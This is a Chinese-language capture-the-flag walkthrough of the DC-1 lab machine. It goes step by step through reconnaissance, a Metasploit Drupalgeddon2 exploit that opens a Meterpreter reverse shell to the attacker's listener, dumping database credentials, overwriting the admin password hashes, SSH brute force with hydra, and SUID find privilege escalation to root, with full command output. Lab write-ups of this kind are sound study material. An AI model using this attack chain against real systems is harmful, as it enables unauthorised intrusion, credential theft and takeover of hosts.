目录
信息收集:
1.存活扫描:
nmap -sn 192.168.149.1/24
靶机ip:192.168.149.213
nmap -sn 192.168.149.1/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-04 21:35 EST
Nmap scan report for 192.168.149.213 //靶机
Host is up (0.00057s latency).
MAC Address: 00:0C:29:06:56:44 (VMware)
Nmap scan report for 192.168.149.247
Host is up (0.00052s latency).
MAC Address: A0:59:50:BC:A9:49 (Intel Corporate)
Nmap scan report for 192.168.149.116
Host is up.
2.端口扫描:
nmap -sT -p- 192.168.149.213
nmap -sT -p- 192.168.149.213
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-04 21:37 EST
Nmap scan report for 192.168.149.213
Host is up (0.00093s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
36235/tcp open unknown
MAC Address: 00:0C:29:06:56:44 (VMware)
3.服务扫描:
nmap -sT -sV -O --version-all -p 22,80,111,52219 192.168.149.213
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
52219/tcp closed unknown
MAC Address: 00:0C:29:06:56:44 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
web部分:
访问80端口:192.168.149.213
web信息收集:
wappalyzer插件:
发现cms:drupal7
whatweb:
信息整理:
cms:Drupal
apache:2.22
php:.5.45
whatweb -v 192.168.149.213
WhatWeb report for http://192.168.149.213
Status : 200 OK
Title : Welcome to Drupal Site | Drupal Site
IP : 192.168.149.213
Country : RESERVED, ZZ
Summary : Apache[2.2.22], Content-Language[en], Drupal, HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PasswordField[pass], PHP[5.4.45-0+deb7u14], Script[text/javascript], UncommonHeaders[x-generator], X-Powered-By[PHP/5.4.45-0+deb7u14]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.2.22 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Content-Language ]
Detect the content-language setting from the HTTP header.
String : en
[ Drupal ]
Drupal is an opensource CMS written in PHP.
Aggressive function available (check plugin file or details).
Google Dorks: (1)
Website : http://www.drupal.org
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.2.22 (Debian) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ MetaGenerator ]
This plugin identifies meta generator tags and extracts its
value.
String : Drupal 7 (http://drupal.org)
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 5.4.45-0+deb7u14
Google Dorks: (2)
Website : http://www.php.net/
[ PasswordField ]
find password fields
String : pass (from field name)
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
String : text/javascript
[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com
String : x-generator (from headers)
[ X-Powered-By ]
X-Powered-By HTTP header
String : PHP/5.4.45-0+deb7u14 (from x-powered-by string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Fri, 05 Jan 2024 10:38:20 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.45-0+deb7u14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 05 Jan 2024 10:38:20 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1704451100"
Content-Language: en
X-Generator: Drupal 7 (http://drupal.org)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2277
Connection: close
Content-Type: text/html; charset=utf-8
msf漏洞搜索和利用:
search Drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval
msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.149.213
rhosts => 192.168.149.213
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > options
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.149.213 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas
ploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.149.116 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
[*] Started reverse TCP handler on 192.168.149.116:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 192.168.149.213
[*] Meterpreter session 1 opened (192.168.149.116:4444 -> 192.168.149.213:57586) at 2024-01-04 21:46:33 -0500
meterpreter > shell
Process 3351 created.
Channel 0 created.
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux
shell部分:
交互式shell:
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
flag1:
提示我们去查看配置文件:
flag2:
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
数据库渗透flag3:
mysql -udbuser -pR0ck3t
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
mysql> use drupaldb;
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
mysql> select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
百度发现Drupal可以利用password-hash.sh文件来生成此种加密的;
find / -name password-hash.sh
cd /var/www/scripts/
php password-hash.sh 123456 // 得到加密结果
mysql -udbuser -pR0ck3t
use drupaldb;update users set pass = "$S$DWqqSw82ISOz/7/tpuyVAc9m8N7eLgmrhFw76TyTMI6A1JMCg02v" where name = 'admin' or name = 'Fred';
www-data@DC-1:/var/www$ find / -name password-hash.sh
find / -name password-hash.sh
/var/www/scripts/password-hash.sh
www-data@DC-1:/var/www$ cd /var/www/scripts/
cd /var/www/scripts/
www-data@DC-1:/var/www/scripts$ ls
ls
code-clean.sh drupal.sh generate-d6-content.sh run-tests.sh
cron-curl.sh dump-database-d6.sh generate-d7-content.sh test.script
cron-lynx.sh dump-database-d7.sh password-hash.sh
www-data@DC-1:/var/www$ php /var/www/scripts/password-hash.sh 123456
php /var/www/scripts/password-hash.sh 123456
password: 123456 hash: $S$DWqqSw82ISOz/7/tpuyVAc9m8N7eLgmrhFw76TyTMI6A1JMCg02v
mysql> use drupaldb;update users set pass = "$S$DWqqSw82ISOz/7/tpuyVAc9m8N7eLgmrhFw76TyTMI6A1JMCg02v" where name = 'admin' or name = 'Fred';
<rhFw76TyTMI6A1JMCg02v" where name = 'admin' or name = 'Fred';
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
mysql> select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DWqqSw82ISOz/7/tpuyVAc9m8N7eLgmrhFw76TyTMI6A1JMCg02v | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWqqSw82ISOz/7/tpuyVAc9m8N7eLgmrhFw76TyTMI6A1JMCg02v | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
成功利用修改后的账密找到flag3:
flag4:
根据flag3的提示,我们查看这台靶机上的用户和密码:
www-data@DC-1:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash //这里的flag4 是个用户
ssh爆破试试:
首先找到kali自带的爆破字典:
find / -name rockyou*
/usr/share/wordlists/rockyou.txt.gz //找到路径
/usr/share/hashcat/rules/rockyou-30000.rule
/usr/share/hashcat/masks/rockyou-2-1800.hcmask
/usr/share/hashcat/masks/rockyou-5-86400.hcmask
/usr/share/hashcat/masks/rockyou-3-3600.hcmask
解压字典文件:
gzip -d /usr/share/wordlists/rockyou.txt.gz
ls /usr/share/wordlists/
amass dirbuster fasttrack.txt john.lst metasploit rockyou.txt wfuzz
dirb dnsmap.txt fern-wifi legion nmap.lst sqlmap.txt wifite.txt
------------------------------------------------------
开始爆破:
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://192.168.149.213
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-04 22:00:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.149.213:22/
[22][ssh] host: 192.168.149.213 login: flag4 password: orange //这里爆破出账密
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-04 22:01:50
------------------------------------------------------
ssh 登陆上去看看有什么:
ssh flag4@192.168.149.213
he authenticity of host '192.168.149.213 (192.168.149.213)' can't be established.
flag4@192.168.149.213's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686
flag4@DC-1:~$ ls
flag4.txt
flag4@DC-1:~$ cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
提权:
尝试SUID提权:
首先想到使用suid提权找到一个属于root的有s权限的文件。
SUID(Set User ID),SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。
常见的可用于SUID提权的文件有:
find、bash、nmap、vim、more、less、nano、cp
当没有s权限时可以使用:chmod u+s 命令路径,增加权限
相关命令:
find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
开始提权
flag4@DC-1:~$ find / -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
flag4@DC-1:~$ find / -name flag4 -exec "/bin/sh" \;
# whoami
root //提权结束
find / -name flag4 -exec "/bin/sh" \;
这个命令是用于在整个文件系统中搜索名为 "flag4" 的文件,并在找到的每个文件上执行 "/bin/sh" 命令。让我们逐步解释每个部分的含义:
- "find":这是一个用于在文件系统中搜索文件和目录的命令。
- "/":这是要搜索的根目录。在这种情况下,"/" 表示整个文件系统。
- "-name flag4":这是一个选项,用于指定要搜索的文件名为 "flag4"。你可以将其替换为你要搜索的实际文件名。
- "-exec":这是一个选项,用于在找到的每个文件上执行指定的命令。
- "/bin/sh":这是要执行的命令。在这种情况下,它是一个shell(即Bourne shell)的路径。
- "":反斜杠用于转义后面的分号,以确保它被解释为-exec选项的一部分。
- ";":这是-exec选项的一部分,用于表示命令的结束。
因此,该命令的作用是在整个文件系统中搜索名为 "flag4" 的文件,并对每个找到的文件执行 "/bin/sh" 命令。请注意,这可能需要管理员权限才能在某些目录中执行命令。
flag5:
# cd /root
# ls
thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7